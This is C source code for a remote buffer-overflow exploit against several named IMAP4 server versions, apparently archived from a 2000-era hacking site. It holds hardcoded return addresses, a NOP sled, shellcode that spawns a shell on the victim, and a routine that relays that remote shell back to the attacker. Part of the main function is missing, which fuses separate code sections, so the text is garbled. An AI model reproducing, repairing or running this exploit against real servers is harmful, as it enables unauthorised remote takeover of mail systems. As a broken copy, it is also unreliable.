/* Ultimate IMAP4 sploit coded by The Tekneeq Crew */ /* http://www.attrition.org/hosted/tekneeq */ #include #include #include #include #include #include #include #define RET_POS 1028 int connect_tcp(struct in_addr addr,unsigned short port); int fdprintf(int dafd,char *fmt,...); void RunShell(int thesock); struct types { char *name; unsigned long ret_addr; }; struct types types[]= { {"IMAP4rev1 9.0",0xbffff6e4 }, {"IMAP4rev1 v10.190",0xbffff30f}, {"IMAP4rev1 v10.223",0xbffff6e4}, {"IMAP4rev1 v10.203",0xbffff30f}, {"IMAP4 Service 8.3",0xbffff724}, {NULL,0} }; char overflow_buff[4096]; struct in_addr victim; /* standard shellcode with a few modifications */ char hellcode[]= "\xeb\x35\x5e\x80\x46\x01\x30\x80\x46\x02\x30\x80\x46\x03\x30" "\x80\x46\x05\x30\x80\x46\x06\x30\x89\xf0\x89\x46\x08\x31\xc0" "\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56" "\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xc6\xff\xff\xff" "\x2f\x32\x39\x3e\x2f\x43\x38"; int main (int argc,char **argv) { unsigned long *ret; char recvbuf[1024]; int sockfd; int i,n=0; if (argc < 2) { printf("Usage: %s [offset]\n",argv[0]); exit(0); } if (!host_to_ip(argv[1],&victim)) { fprintf(stderr,"Hostname lookup failure\n"); exit(0); } memset(overflow_buff,0x90,4096); for (i=RET_POS-(strlen(hellcode));i0) { recvbuf[n]=0; write(thesock,recvbuf,n); } } } } int fdprintf(int dafd,char *fmt,...) { char mybuffer[4096]; va_list va; va_start(va,fmt); vsnprintf(mybuffer,4096,fmt,va); write(dafd,mybuffer,strlen(mybuffer)); va_end(va); return(1); } int connect_tcp(struct in_addr addr,unsigned short port) { struct sockaddr_in serv; int thesock,flags; thesock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); bzero(&serv,sizeof(serv)); memcpy(&serv.sin_addr,&addr,sizeof(struct in_addr)); serv.sin_port=htons(port); serv.sin_family=AF_INET; if (connect(thesock,(struct sockaddr *)&serv,sizeof(serv)) < 0) return(-1); else return(thesock); } int host_to_ip(char *hostname,struct in_addr *addr) { struct hostent *res; res=gethostbyname(hostname); if (res==NULL) return(0); memcpy((char *)addr,res->h_addr,res->h_length); return(1); } /* www.hack.co.za [2000]*/